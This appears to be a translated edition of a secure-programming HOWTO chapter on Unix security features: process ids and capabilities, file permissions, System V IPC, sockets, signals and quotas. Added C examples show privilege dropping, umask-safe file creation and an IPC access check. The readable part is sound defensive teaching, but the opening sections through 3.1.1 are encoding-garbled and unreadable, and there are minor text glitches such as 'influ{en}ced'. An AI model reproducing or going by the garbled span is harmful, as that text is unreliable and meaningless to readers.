lvx[X̃VXe܂B̃VXéA@\肵
ȃJ[lƏ]̓J[lŎĂ჌x̋@\u[Uvv
OƂĎĂ܂B

Unix CNȃVXeɂ́A啝ɉCsāAčhȂvĂ
MAC(B1 xȏ)̋łȃZLeBɓʑΉĂ̂܂
B̔ł̃hLgł́ÃVXe₻̉ۑ͈܂B
͈̂͂LčsƎvĂ܂Bɏڍׂȏ̂
ÂƂŗpł܂BƂ΁ASGI ́uTrusted IRIX/Bvɂ
ڂ̂́ANSA  Final Evaluation Reports (FERs) <http://
www.radium.ncsc.mil/tpep/library/fers/index.html> łB

[UOCƁÃ[U̓[UĂ uid([U ID)
 gid(O[v ID)\lɊ蓖Ă܂B uid  0 ̃[U
ʂȌ()ĂāAurootvƌĂ܂B Unix CN
ȃVXe(Unix ܂)̂قƂǂł́Aroot ̓ZLeB`FbN̂
Ƃǂ󂯂邱ƂȂAVXeǗsꍇɎgpĂ܂B
Unix VXe̒ɂ́Agid  0 ̃[UʈɂȂĂāAO[
vxŃ\[Xɑ΂Ė̃ANZXĂ̂܂
[Gay 2000, 228]B̎͑̃VXe(Linux ̂悤)ł͓Ă͂܂܂
񂪁Â悤ȃVXełĂO[v 0 ́A{IɂׂĂ̌
Ă܂BƂ̂AVXe֘A̓ʂȃt@ĆAO[v 0 
LĂP[XłBZLeB̓_猩ėBuΏہv
ƂȂ́AꂪvZXł (낢ȂƂsĂ鐳̂v
ZXȂ̂ł)BvZX͂܂܂ȃf[^ɃANZXł܂Bt@CV
Xe(FSO)łA System V ̃vZXԒʐM(IPC)łAlb
g[NE|[gł肵܂BvZX̓VOiݒł܂B
̑ZLeB֘ÃgsbNƂẮAquota  limitACuA
A PAM ܂B̌ATuZNVŏڂĂ܂B

 

3.1. vZX

Unix CNȃVXeł́A[Ux̓̓vZX𓮂ƂŎ
Ă܂B Unix VXȇ啔́uXbhvvZXƂ͓Ɨ
TOƂăT|[gĂ܂BXbh̓vZXŃL
āAVXẽXPW[̓XbhgXPW[OĂ܂
B Linux ͂Ƃ͈قȂ@ŎsĂ܂(͗DꂽƎv
܂)BXbhƃvZX͊{IɈႢ͂܂B̂ Linux
ɂẮAvZX 1 ̃vZXNɁAǂ̃\[X
L̂Ił܂(Ƃ΃LƂ)B Linux
J[ĺAXbhxőxœKɂȂ悤ɓ삵܂Bڂ
 clone(2) ĂB Linux ̃J[lJ҂́uXbhvu
vZXvƂɁAu^XNvƂt悭g_ɒӂĂ
BAΊOIȃhLgɂ́AvZXƂtg܂
(Ȃ̂ŁAł̓vZXƂtg܂)B}`EXbh̃Av
P[VvOꍇɂ́AL̂悤ȈႢB邽߁A
ʏ͕W̃XbĥǂꂩgK؂łBƈڐA
Ȃ邾łȂACuԐړIȃx̋@\ǉ񋟂ł܂B
́ÃAvP[Vx̃XbhAIy[eB
OVXe̒PƂ̃XbhƂĎs邱ƂŎĂ܂B
邱ƂŁAVXẻ炩̃AvP[V́A\炩
ł܂B

 

3.1.1. vZX̑

ł́AUnix CNȃVXeœvZXꂼꂪĂ\I
ȑĂ܂B

 E ruidArgid \\ uid Ǝ gid ̂ƂŁǍŃvZX
    ܂B
   
 E euidAegid \\ uid Ǝ gid ͌̃`FbNɗp܂(t
    @CVXe)B
   
 E suidAsgid \\ۑ uid ƕۑ gid ͉LŘ_܂ÁuL
    EvT|[ĝɗp܂B Unix CNȃVXe
    ׂĂ̋@\T|[gĂ킯ł͂܂񂪁A唼̃VX
    e(Linux  Solaris ܂)T|[gĂ܂BVXe̋@
    \ POSIX WŎĂ邩𒲂ׂȂAsysconf(2) g
    _POSIX_SAVED_IDS Lm߂ĂB
   
 E ⏕O[v\\O[v(gid)̈ꗗŁA[Uo[ɂȂĂ
    O[v̈ꗗłBIWi version 7 Unix ł́A݂Ă
    BvZX͓ɕ̃O[vɂ͑AʂȃR}hg
    ăO[vύXȂ΂܂B BSD ł́Aꂼ̃vZ
    Xł̃O[v̈ꗗT|[gĂA_ȍ\ƂĂ
    B܂̒ǉ@\݂͌ł͍LĂ܂ (Linux 
    Solaris ܂)B
   
 E umask \\Vt@CVXe̎̂쐬鎞ɁAftHg
    ANZX̐ݒ߂rbgłBumask(2)ĂB
   
 E XPW[OEp^\\vZXɂ͂ꂼAftHg̃X
    PW[Õ|V܂BSCHED_OTHER ́AǉŃp^
    ݒłA nice vCIeBAJE^[ݒł܂Bڍׂ
    A sched_setscheduler(2) ĂB
   
 E limits \\vZXPʂ̃\[X̐ł(LQ)B
   
 E t@CVXẽ[g\\vZX猩[gEt@CVXe
    ("/")̈ʒuB chroot(2)QƂĂB
   
 

ł́AvZXɊ֘AĂ͂̂́A܂ʓIł͂Ȃ̂
܂B

 E fsuidAfsgid \\ uid  gid ̓t@CVXeւ̃ANZX`
    FbN̂Ɏg܂Bʏ́Aꂼ euid  egid ƓłB
    ̑ Linux ƎłB
   
 E PCpreB\\ POSIX Œ`ĂPCpreBBvZX
    ɂẴPCpreB́A3 ܂B́AApA
    łBPOSIX PCpreBɂĂ̏ڂ́ALĂ
    B Linux ̃J[l 2.2 o[Wȏł΂̋@\T|[g
    Ă܂B Unix CNȃVXełT|[gĂ܂A
    ʓIƂ킯ł͂܂B
   
 

Linux ɂāAǂ̑eX̃vZXɊ֘AĂ̂𐳊mɒm
KvȂALinux ̃\[XR[hłM̂񌹂łB
A /usr/include/linux/sched.h ɂ task_struct Ƃ`͏dvłB

VvZXNɂ́Afork(2) VXeR[ĝʓIł
B BSD  vfork(2) ƂœK͂ǔł𓱓܂B vfork
(2) ̊{Iȍl͒PŁAgKvȂΎgȂłBڂ́A
Section 7.6 ĂB

Linux ł́AŗL̃VXeR[ł clone(2)T|[gĂ܂B
̃VXeR[ fork(2) Ɠlɓ삵܂AL\[X (
Ƃ΁At@CEfBXNv^)wł܂B܂܂
BSD VXeł rfork() VXeR[(IWi Plan9 ŊJ)
Ă܂BĂяo͈قȂ܂A{Iȍl͓ł(
L̂ɑ΂Ă̑āAvZX𐶐܂)BvO
ɈڐAȂAł΂̃VXeR[̂܂܎g
ł͂܂BLłqׂ܂AڐAȂA
VXeR[pXbhCuƂɂǂł傤B

̃hLǵAvO߂̊ȃ`[gAł͂
܂BāAvZXʓIɗpłɂĂ͏
Ă܂BɏƂ wait(2)  exit(2) ƂhLg
pł܂B

 

3.1.2. POSIX Capabilities

POSIX capabilities are sets of bits that permit splitting the privileges
typically held by root into a larger set of more specific privileges. POSIX
capabilities are defined by a draft IEEE standard; they are not unique to
Linux, but they are not universally supported by other Unix-like systems
either. Linux kernel 2.0 did not support POSIX capabilities, while version
2.2 added support for POSIX capabilities to processes. When Linux
documentation (including this one) says "requires root privilege", in nearly
all cases it really means "requires a capability", as documented in the
capability documentation. If you need to know the specific capability
required, look it up in the capability documentation.

In Linux, the eventual intent is to permit capabilities to be attached to
files in the filesystem; as of this writing, however, this is not yet
supported. There is support for transferring capabilities to other
processes, but this is disabled by default. Linux version 2.2.11 added a
feature that makes capabilities more directly useful, called the "capability
bounding set". The capability bounding set is a list of capabilities that
are allowed to be held by any process on the system (otherwise, only the
special init process can hold them). If a capability does not appear in the
bounding set, it may not be exercised by any process, no matter how
privileged. This feature can be used to, for example, disable kernel module
loading. A sample tool that takes advantage of this is LCAP at
http://pweb.netcom.com/~spoon/lcap/. [Translator's note: LCAP is a tool that
removes capabilities supported by the kernel from the bounding set, so that
the system becomes harder to subvert.]

More information about POSIX capabilities is available at
ftp://ftp.kernel.org/pub/linux/libs/security/linux-privs.

 

3.1.3. Process Creation and Manipulation

Processes may be created using fork(2), the not-recommended vfork(2), or the
Linux-unique clone(2); all of these system calls duplicate the existing
process, creating two processes out of one. A process can execute a
different program by calling execve(2), or various front ends to it (for
example, see exec(3), system(3), and popen(3)).

When a program is executed and its file has the setuid or setgid bit set,
the process' EUID or EGID (respectively) is usually set to the value of the
file's owner. This functionality was the source of an old Unix security
weakness when used to support setuid or setgid scripts, due to a race
condition. Between the time the kernel opens the file to see which
interpreter to run and the time the (now set-id) interpreter turns around
and reopens the file to interpret it, an attacker might change the file
(directly or via symbolic links).

Different Unix-like systems handle the security issue for setuid scripts in
different ways. Some systems, such as Linux, completely ignore the setuid
and setgid bits when executing scripts, which is clearly a safe approach.
Most modern releases of System V R4 and BSD 4.4 use a different approach to
avoid the kernel race condition. On these systems, when the kernel passes
the name of the set-id script to the interpreter, rather than passing a
pathname (which would permit the race condition) it passes the filename
/dev/fd/3. This is a special file already opened on the script, so there is
no race condition for an attacker to exploit. Even on these systems I
recommend against using setuid/setgid shell scripts for secure programs,
for reasons discussed below.

In some cases a process can change its various uid and gid values; see
setuid(2), seteuid(2), setreuid(2), and the Linux-unique setfsuid(2). In
particular, the saved user id (suid) attribute exists to permit trusted
programs to temporarily switch uids. Unix-like systems supporting the suid
use the following rules: if the ruid is changed, or the euid is set to a
value not equal to the ruid, the suid is set to the new euid. Unprivileged
users can set their euid from their suid, the ruid to the euid, and the euid
to the ruid.

The Linux-unique fsuid process attribute is intended to permit programs like
the NFS server to limit themselves to only the filesystem rights of some
given uid, without giving that uid permission to send signals to the
process. Whenever the euid is changed, the fsuid is changed to the new euid
value; the fsuid value can be set separately using setfsuid(2), a
Linux-unique call. Note that non-root callers can only set the fsuid to the
current ruid, euid, suid, or current fsuid values.
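The saved-uid rules above are what make "drop privilege temporarily, regain it later" and "drop privilege for good" two different operations. The following C routines are an added example written for this edition, not code from the HOWTO; they assume a Linux/glibc system and, for the paranoia check, that the unprivileged uid is not 0. Note the ordering in drop_privileges_permanently(): supplementary groups first (only root may call setgroups), then the gid, then the uid, because once the euid is no longer 0 the process can no longer change its gids. Every switch is verified afterwards rather than assumed to have worked.

```c
#include <sys/types.h>
#include <unistd.h>
#include <grp.h>

/* Temporarily give up privilege: only the effective uid changes, so the
 * saved uid still holds the privileged id and restore_privileges() can
 * get it back. Returns 0 on success, -1 otherwise. */
int temporarily_drop_privileges(uid_t unprivileged_uid)
{
    if (seteuid(unprivileged_uid) != 0)
        return -1;
    /* Never assume the switch worked: verify it. */
    return geteuid() == unprivileged_uid ? 0 : -1;
}

int restore_privileges(uid_t privileged_uid)
{
    if (seteuid(privileged_uid) != 0)
        return -1;
    return geteuid() == privileged_uid ? 0 : -1;
}

/* Permanently drop to uid/gid. setuid() called by a root process sets the
 * real, effective AND saved uid, which is what makes the drop irrevocable;
 * called with only the euid dropped (saved uid still 0) it would leave a way
 * back, which the final check detects. Returns 0 on success. */
int drop_privileges_permanently(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(0, NULL) != 0)   /* clear supplementary groups */
        return -1;
    if (setgid(gid) != 0 || setuid(uid) != 0)        /* gid before uid */
        return -1;
    if (getuid() != uid || geteuid() != uid || getgid() != gid || getegid() != gid)
        return -1;
    /* Paranoia: regaining root must now be impossible (assumes uid != 0). */
    if (uid != 0 && seteuid(0) == 0)
        return -1;
    return 0;
}

int main(void)
{
    /* Running as an ordinary user this is a no-op switch to ourselves;
     * in a setuid-root program the same calls are what matter. */
    if (temporarily_drop_privileges(getuid()) != 0) return 1;
    if (restore_privileges(geteuid()) != 0) return 1;
    return drop_privileges_permanently(getuid(), getgid()) == 0 ? 0 : 1;
}
```

The "verify after every call" pattern is deliberate: on some systems setuid() returns success even when it did less than expected, and a privilege drop that silently failed is worse than one that aborts the program.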

 

3.2. Files

On all Unix-like systems, the primary repository of information is the file
tree, rooted at "/". The file tree is a hierarchical set of directories, each
of which may contain filesystem objects (FSOs).

In Linux, filesystem objects (FSOs) may be ordinary files, directories,
symbolic links, named pipes (also called first-in first-outs, or FIFOs),
sockets (see below), character special (device) files, or block special
(device) files (in Linux, this list is given in the find(1) command). Other
Unix-like systems have an identical or similar list of FSO types.

Filesystem objects are collected on filesystems, which can be mounted and
unmounted on directories in the file tree. A filesystem type (for example
ext2 or FAT) is really just a particular way of storing data on a disk,
optimized for speed and reliability; the filesystem type determines its
semantics. Note that the word "filesystem" is often used to mean a
filesystem type.

 

3.2.1. Filesystem Object Attributes

Different filesystem types support slightly different sets of access control
attributes, and access controls can be affected by options selected at mount
time. On Linux, ext2 is currently the most popular filesystem, but Linux
supports a vast number of filesystems. Most Unix-like systems also support
multiple filesystem types.

Most filesystems on Unix-like systems store at least the following:

  * owning uid and gid - identify the "owner" of the filesystem object. Only
     the owner or root can change the access control attributes unless
     otherwise noted.

  * permission bits - read, write, and execute bits for each of user
     (owner), group, and other. For ordinary files, read, write, and execute
     have their usual meanings. In directories, the "read" permission is
     necessary to list a directory's contents, while the "execute"
     permission is sometimes called "search" permission and is necessary to
     actually enter the directory to use its contents. "Write" permission on
     a directory permits adding, removing, and renaming files in that
     directory; if you only want to permit adding, set the sticky bit noted
     below. Note that the permission values of symbolic links are never
     used; it is only the values of their containing directories and of the
     linked-to file that matter.

  * "sticky" bit - when set on a directory, unlinks (removes) and renames
     of files in that directory are limited to the file owner, the directory
     owner, or root. This is a very common Unix extension and is specified
     in the Open Group's Single Unix Specification version 2. Old versions
     of Unix called this the "save program text" bit and used it to indicate
     executable files that should stay in memory (not be swapped out).
     Systems that did this ensured that only root could set the bit
     (otherwise users could have crashed systems by forcing "everything" into
     memory). In Linux, this bit has no effect on ordinary files and
     ordinary users can set it on the files they own; Linux's virtual memory
     management makes this old use irrelevant.

  * setuid, setgid - when set on an executable file, executing the file will
     set the process' effective uid or effective gid to the value of the
     file's owning uid or gid (respectively). All Unix-like systems support
     this. In Linux and System V systems, when setgid is set on a file that
     has no execute permissions, it indicates a file that is subject to
     mandatory locking during access (if the filesystem is mounted to
     support mandatory locking); this overloading of meaning surprises many
     people and is not universal across Unix-like systems. In fact, the Open
     Group's Single Unix Specification version 2 for chmod(3) permits systems
     to ignore requests to turn on setgid for files that aren't executable
     instead of overloading the bit this way. In Linux and Solaris, when
     setgid is set on a directory, files created in the directory
     automatically get the directory's gid. The purpose of this is to
     support "project directories": users can save files into such a
     specially set directory and the group owner changes automatically.
     However, setting the setgid bit on directories is not specified by
     standards such as the Single Unix Specification [Open Group 1997].
     [Translator's note: file locking comes in two kinds, mandatory locking
     and advisory locking. With mandatory locking the kernel enforces the
     lock on every process, so a lock can be relied upon regardless of
     what other processes do; with advisory locking each process has to
     check the lock itself, so it is only effective among processes that
     cooperate. See linux/Documentation/mandatory.txt in the kernel
     documentation for details.]

  * timestamps - access and modification times are stored for each
     filesystem object. However, the owner is allowed to set these values
     arbitrarily (see touch(1)), so be careful about trusting this
     information. All Unix-like systems support this.

The following attributes are Linux-unique extensions of the ext2 filesystem,
though a number of other filesystems have similar functionality:

  * immutable bit - no changes to the filesystem object are allowed; only
     root can set or clear this bit. This is only supported by ext2 and is
     not portable across all Unix systems (or even all Linux filesystems).

  * append-only bit - only appending to the filesystem object is allowed;
     only root can set or clear this bit. This is only supported by ext2
     and is not portable across all Unix systems (or even all Linux
     filesystems).

Other common extensions include some sort of bit indicating "this file
cannot be deleted".

Many of these values can be influenced at mount time, so that, for example,
certain bits can be treated as though they had a particular value
(regardless of their values on the media). See mount(1) for more information
about this. These options are useful, but be aware that some of them are
intended to simplify ease of use and aren't really sufficient to prevent
certain actions. For example, on Linux, mounting with "noexec" disables
execution of programs on that filesystem; as noted in the manual page, it is
intended for mounting filesystems containing binaries for incompatible
systems. On Linux, this option won't completely prevent someone from running
the files: they can copy the files somewhere else to run them, or even use
the command "/lib/ld-linux.so.2" to run the file directly.

Some filesystems don't support some of these access control values; again,
see mount(1) for how these filesystems are handled. In particular, many
Unix-like systems support MS-DOS disks, which by default support very few of
these attributes (and there is no standard way to define these attributes on
them). In that case, Unix-like systems emulate the standard attributes
(possibly implementing them through special on-disk files), and these
attributes can be influ{en}ced by the mount(1) command.

It is important to note that, for adding and removing files, only the
permission bits and owner of the file's directory really matter, unless the
Unix-like system supports a more complex scheme (such as POSIX ACLs). Unless
the system has other extensions (and stock Linux 2.2 doesn't), a file that
has no permissions in its permission bits can still be removed if its
containing directory permits it. Also, if an ancestor directory permits its
children to be changed by some user or group, then any of that directory's
descendants can be replaced by that user or group.

The draft IEEE POSIX standard on security defines a technique for true ACLs
that support a list of users and groups with their permissions.
Unfortunately, this is not widely supported, nor is it supported exactly the
same way across Unix-like systems. Stock Linux 2.2, for example, has neither
ACLs nor POSIX capability values in the filesystem.

It should be noted that on Linux, the ext2 filesystem by default reserves a
small amount of space for the root user. This is a partial defense against
denial-of-service attacks; even if a user fills a disk that is shared with
the root user, the root user has a little space left over (for example, for
critical functions). The default is 5% of the filesystem space; see
mke2fs(8), in particular its "-m" option.

 

3.2.2. Creation Time Initial Values

At creation time, the following rules apply. On most Unix systems, when a
new filesystem object is created via creat(2) or open(2), the FSO's uid is
set to the process' euid and the FSO's gid is set to the process' egid.
Linux works slightly differently because of its fsuid extension: the FSO's
uid is set to the process' fsuid, and the FSO's gid is set to the process'
fsgid. If the containing directory's setgid bit is set, or the filesystem's
"grpid" option is set, the FSO's gid is instead set to the gid of the
containing directory. Many systems, including Sun Solaris and Linux, support
the setgid directory extension. As noted earlier, this special case supports
"project" directories: to make a "project" directory, create a special group
for the project, create a directory for the project owned by that group, and
then make the directory setgid; files placed there are then automatically
owned by the project group. Similarly, if a new subdirectory is created
inside a directory with the setgid bit set (and the filesystem's grpid
option is not set), the new subdirectory will also have its setgid bit set
(so that project subdirectories "do the right thing"). In all other cases
the setgid bit is clear on a new file. This is the rationale for the
"user-private group" scheme (used by Red Hat Linux and some others). In this
scheme, every user is a member of a "private" group with just themselves as
a member, so their defaults can permit the group to read and write any file
(since they're the only member of the group). Thus, when a file's group
membership is transferred this way, read and write privileges are
transferred too. [Translator's note: this explanation of user-private groups
is hard to follow on its own; see the user-private groups section of the Red
Hat manual, <http://www.jp.redhat.com/manual/Doc71/RHDOCS/rhl-rg-ja-7.1/
s1-users-groups-private-groups.html>.] The FSO's basic access control values
(read, write, execute) are computed as (requested values & ~ umask of the
process). New files always start with a clear sticky bit and a clear setuid
bit.
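The formula (requested values & ~umask) is easy to state and easy to get wrong in practice, because the umask is inherited from whoever ran the program. The following C example, added here and not part of the original HOWTO, sets the umask explicitly before creating a file, uses O_EXCL so the call fails instead of following a symbolic link or opening a file an attacker planted in advance, and reads back the resulting mode rather than trusting the request. It assumes a writable /tmp.

```c
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdio.h>

/* Create a file that must not already exist, readable and writable only by
 * the owner. Requested mode 0666 is masked by umask 077, giving 0600.
 * Returns the permission bits actually set (st_mode & 07777), or -1. */
int create_private_file(const char *path)
{
    mode_t old_umask = umask(077);            /* do not inherit the caller's umask */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0666);
    umask(old_umask);                         /* restore for the rest of the program */
    if (fd < 0)
        return -1;                            /* exists already, or a dangling symlink */

    struct stat st;
    if (fstat(fd, &st) != 0) {                /* fstat on the open fd, never stat on the path */
        close(fd);
        return -1;
    }
    close(fd);
    return (int)(st.st_mode & 07777);
}

/* Demonstration: creating the file works once and yields 0600; a second
 * O_EXCL create of the same name must fail. Returns the mode of the first
 * creation, or -1 if the second creation unexpectedly succeeded. */
int demo_private_file(void)
{
    char path[64];
    snprintf(path, sizeof path, "/tmp/secprog_umask_demo_%ld", (long)getpid());
    int mode = create_private_file(path);
    int second = create_private_file(path);
    unlink(path);
    return second == -1 ? mode : -1;
}

int main(void)
{
    return demo_private_file() == 0600 ? 0 : 1;
}
```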

 

3.2.3. Changing Access Control Attributes

You can set most of these values with chmod(2), fchmod(2), or chmod(1), but
see also chown(1) and chgrp(1). In Linux, the Linux-unique attributes are
manipulated using chattr(1).

Note that in Linux, only root can change the owner of a given file. Some
Unix-like systems allow ordinary users to transfer ownership of their files
to another user, but this causes complications and is forbidden by Linux.
For example, if you are trying to limit disk usage, allowing such operations
would let users claim that their large files are actually owned by some
other "victim".

 

3.2.4. Using Access Control Attributes

Under Linux and most Unix-like systems, read and write permissions are only
checked when the file is opened; they are not re-checked on every read or
write. Still, a large number of calls do check these attributes, since the
filesystem is so central to Unix-like systems. Calls that check these
attributes include open(2), creat(2), link(2), unlink(2), rename(2),
mknod(2), symlink(2), and socket(2).

 

3.2.5. Filesystem Hierarchy

Over the years conventions have been built up on "what files go where".
Follow these conventions as much as possible; store files in the
appropriate place in the directory hierarchy. For example, put system-wide
configuration in /etc. The Filesystem Hierarchy Standard (FHS) tries to
define this logically, and is widely adopted by Linux systems. The FHS is an
update of the earlier Linux Filesystem Structure standard (FSSTND),
incorporating lessons learned from Linux, BSD, and System V systems. See
http://www.pathname.com/fhs for more information about the FHS. A summary of
these conventions is in hier(5) for Linux and hier(7) for Solaris.
Sometimes different conventions disagree; where possible, make these
locations configurable at compile or installation time.

The Linux Standard Base <http://www.linuxbase.org> has adopted the FHS. It
is an organization that works to ensure binary compatibility across Linux
distributions, so that software can be built to run on a wide variety of
Linux systems.

 

3.3. System V IPC

Many Unix-like systems, including Linux and System V systems, support System
V interprocess communication (IPC) objects. Indeed, System V IPC is required
by the Open Group's Single UNIX Specification, Version 2 [Open Group 1997].
System V IPC objects come in three kinds: message queues, semaphore sets,
and shared memory segments. Each such object has the following attributes:

  * read and write permissions for each of the creator, the creator's group,
     and others.

  * creator uid and gid - the uid and gid of the creator of the object.

  * owning uid and gid - the uid and gid of the owner of the object
     (initially equal to the creator's uid and gid).

When accessing such objects, the rules are as follows:

  * if the process has root privileges, access is granted.

  * if the process' euid is the owner or creator uid of the object, then the
     appropriate creator permission bit is checked to see if access is
     granted.

  * if the process' egid is the owner or creator gid of the object, or one
     of the process' supplementary groups is the owning or creating gid of
     the object, then the appropriate creator group permission bit is
     checked for access.

  * otherwise, the appropriate "other" permission bit is checked for access.

Note that root, or a process with the euid of either the owner or creator,
can set the owning uid and gid and/or remove the object. More information is
available in ipc(5).
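The four rules above are the whole access decision, so they are easy to write down as a pure function and check against a constructed ipc_perm. The example below is added for this edition (not from the HOWTO or any kernel); it assumes the file-style layout of the mode field (0400/0200 owner, 0040/0020 group, 0004/0002 other), and takes "has root privilege" as an explicit flag because on Linux that really means the CAP_IPC_OWNER capability rather than euid 0.

```c
#include <sys/ipc.h>
#include <sys/types.h>
#include <string.h>
#include <stddef.h>

/* Build an ipc_perm as it looks right after creation: creator == owner. */
struct ipc_perm make_ipc_perm(uid_t uid, gid_t gid, unsigned mode)
{
    struct ipc_perm p;
    memset(&p, 0, sizeof p);
    p.uid = p.cuid = uid;
    p.gid = p.cgid = gid;
    p.mode = mode;
    return p;
}

/* Access decision for a System V IPC object, following the four rules:
 * root wins; then owner/creator uid bits; then owner/creator gid bits
 * (egid or any supplementary group); otherwise the "other" bits. */
int ipc_access_allowed(const struct ipc_perm *p, uid_t euid, gid_t egid,
                       const gid_t *groups, size_t ngroups,
                       int want_read, int want_write, int has_root_privilege)
{
    unsigned want = (want_read ? 4u : 0u) | (want_write ? 2u : 0u);
    unsigned shift;

    if (has_root_privilege)
        return 1;                                           /* rule 1 */
    if (euid == p->uid || euid == p->cuid) {
        shift = 6;                                          /* rule 2: owner bits */
    } else {
        int in_group = (egid == p->gid || egid == p->cgid);
        for (size_t i = 0; !in_group && i < ngroups; i++)
            if (groups[i] == p->gid || groups[i] == p->cgid)
                in_group = 1;
        shift = in_group ? 3 : 0;                           /* rule 3 or rule 4 */
    }
    return (((unsigned)p->mode >> shift) & want) == want;
}

int main(void)
{
    /* Constructed object: owned by uid 1000 / gid 100, mode 0640. */
    struct ipc_perm p = make_ipc_perm(1000, 100, 0640);
    gid_t groups[] = { 100, 200 };
    int ok = ipc_access_allowed(&p, 1000, 5, NULL, 0, 1, 1, 0)        /* owner: rw */
          && ipc_access_allowed(&p, 2000, 5, groups, 2, 1, 0, 0)      /* via supplementary group: r */
          && !ipc_access_allowed(&p, 2000, 100, NULL, 0, 0, 1, 0)     /* group may not write */
          && !ipc_access_allowed(&p, 2000, 5, NULL, 0, 1, 0, 0);      /* others: nothing */
    return ok ? 0 : 1;
}
```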

 

3.4. Sockets and Network Connections

Sockets are used for communication, particularly over a network. Sockets
were originally developed by the BSD branch of Unix systems, but they are
generally portable to other Unix-like systems: Linux and System V variants
support sockets as well, and socket support is required by the Open Group's
Single Unix Specification [Open Group 1997]. System V systems traditionally
used a different (incompatible) network communication interface, but it is
worth noting that systems like Solaris include support for sockets.
socket(2) creates an endpoint for communication and returns a descriptor, in
a manner similar to open(2) for files. The parameters for socket specify the
protocol family and type, such as the Internet domain (TCP/IP version 4),
Novell's IPX, or the "Unix domain". A server then typically calls bind(2),
listen(2), and accept(2) or select(2). A client typically calls bind(2)
(though that may be omitted) and connect(2). See the respective man pages
for more information. It can be difficult to understand how to use sockets
from their man pages alone; you might want to consult other papers such as
Hall "Beej" [1999] to learn how these calls are used together.

"Unix domain sockets" don't actually represent a network protocol; they can
only connect to sockets on the same machine (at the time of this writing,
for the standard Linux kernel). When used as a stream, they are fairly
similar to named pipes, but with significant advantages. In particular, a
Unix domain socket is connection-oriented; each new connection to the
socket results in a new communication channel, a very different situation
from named pipes. Because of this property, Unix domain sockets are often
used instead of named pipes to implement IPC for many important services.
Just as you can have unnamed pipes, you can have unnamed Unix domain
sockets using socketpair(2); unnamed Unix domain sockets are useful for IPC
in a way similar to unnamed pipes.

There are several interesting security implications of Unix domain sockets.
First, although Unix domain sockets can appear in the filesystem and can
have stat(2) applied to them, you can't use open(2) to open them (you have
to use the socket(2) and friends interface). Second, Unix domain sockets can
be used to pass file descriptors between processes (not just the file's
contents). This odd capability, not available in most other ABIs, is used in
many IPC implementations (a descriptor can be used as a "capability" in the
computer science sense of the word). File descriptors are sent using
sendmsg(2), where the msg (message)'s field msg_control points to an array
of control message headers (the field msg_controllen must give the number of
bytes in the array). Each control message is a struct cmsghdr followed by
data, and for this purpose you want cmsg_type set to SCM_RIGHTS. A file
descriptor is retrieved through recvmsg(2) and then tracked down in the
analogous way. Frankly, this feature is quite obscure, but it can be used to
implement many interesting IPC capabilities.

Linux 2.2 and later support an additional feature in Unix domain sockets:
you can acquire the peer's "credentials" (the pid, uid, and gid). Here is
some sample code:

 /* fd = file descriptor of the Unix domain socket connected
    to the client you wish to identify. struct ucred is a GNU
    extension: #define _GNU_SOURCE before #include <sys/socket.h>. */

 struct ucred cr;
 socklen_t cl = sizeof(cr);      /* the length argument is a socklen_t */

 if (getsockopt(fd, SOL_SOCKET, SO_PEERCRED, &cr, &cl) == 0) {
   printf("Peer's pid=%d, uid=%d, gid=%d\n",
          (int)cr.pid, (int)cr.uid, (int)cr.gid);
 }

Standard Unix convention is that binding to local TCP and UDP port numbers
less than 1024 requires root privilege, while any process can bind to an
unused port number of 1024 or greater. Linux follows this convention; more
specifically, Linux requires a process to have the capability
CAP_NET_BIND_SERVICE to bind to a port number less than 1024, and this
capability is normally only held by processes with an euid of 0. The
adventurous can check this in the Linux source: in Linux 2.2.12 it is the
function inet_bind() in /usr/src/linux/net/ipv4/af_inet.c.

 

3.5. Signals

Signals are a simple form of "interruption" in the Unix-like OS world, and
are an ancient part of Unix. A process can send a "signal" to another
process (say, using kill(1) or kill(2)), and that other process receives and
handles the signal asynchronously. For a process to have permission to send
an arbitrary signal to some other process, the sending process must either
have root privileges, or the real or effective user id of the sending
process must equal the real or saved set-user-id of the receiving process.
However, some signals can be sent in other ways. In particular, SIGURG can
be delivered over a network through a TCP/IP out-of-band (OOB) message.
[Translator's note: "out-of-band" means that an urgent message is carried
over a channel independent of the normal data.]

Although signals are an ancient part of Unix, they have had different
semantics in different implementations. Basically, they involve questions
such as "what happens when a signal occurs while handling another signal?"
The older Linux libc 5 used a different set of semantics for some signal
operations than the newer GNU libc libraries. Calling C library functions is
often unsafe within a signal handler, and even some system calls aren't
safe; you need to examine the documentation for each call you make to see if
it promises to be safe to call inside a signal handler. For more
information, see the glibc FAQ (on some systems a local copy is available at
/usr/doc/glibc-*/FAQ).

For new programs, just use the POSIX signal system (which in turn was based
on BSD work); this set is widely supported and doesn't have some of the
problems that the older signal systems did. The POSIX signal system is based
on the sigset_t datatype, which can be manipulated through a set of
operations: sigemptyset(), sigfillset(), sigaddset(), sigdelset(), and
sigismember(). You can read about these in sigsetops(3). Then use
sigaction(2), sigprocmask(2), sigpending(2), and sigsuspend(2) to set up and
manipulate signal handling (see their man pages for more information).

In general, make any signal handlers very short and simple, and look
carefully for race conditions. Signals, since they are by nature
asynchronous, can easily cause race conditions.

A common convention exists for servers: if you receive SIGHUP, you should
close any log files, reopen and reread the configuration files, and then
reopen the log files. This supports reconfiguration without halting the
server, and log rotation without data loss. If you are writing a server
where this convention makes sense, please support it.

Michal Zalewski [2001] has written an excellent tutorial on how signal
handlers are exploited, and has recommendations for how to eliminate signal
race problems. I encourage you to read his summary for more information;
here are my recommendations, which are similar to Michal's:

  * Where possible, have your signal handlers unconditionally set a specific
     flag and do nothing else.

  * If you must have more complex signal handlers, use only calls
     specifically designated as being safe for use in signal handlers. In
     particular, don't use malloc() or free() in C (which on most systems
     aren't protected against signals), nor the many functions that depend
     on them (such as the printf() family and syslog()). You could try to
     "wrap" calls to unsafe library calls with a check of a global flag (to
     avoid re-entry), but I wouldn't recommend it.

  * Block signal delivery during all non-atomic operations in the program,
     and block signal delivery inside signal handlers.
   
 

3.6. Quotas and Limits

Many Unix-like systems have mechanisms to support filesystem quotas and
process resource limits. This certainly includes Linux. These mechanisms are
particularly useful for preventing denial-of-service attacks; by limiting
the resources available to each user, you can make it hard for a single user
to use up all the system resources. Be careful with terminology here,
because both filesystem quotas and process resource limits have "hard" and
"soft" limits, but the terms mean slightly different things.

You can define storage (filesystem) quota limits on each mount point for the
number of blocks of storage and/or the number of unique files (inodes) that
can be used, and you can set such limits for a given user or a given group.
A "hard" quota limit is a never-to-exceed limit, while a "soft" quota can be
temporarily exceeded. See quota(1), quotactl(2), and quotaon(8).

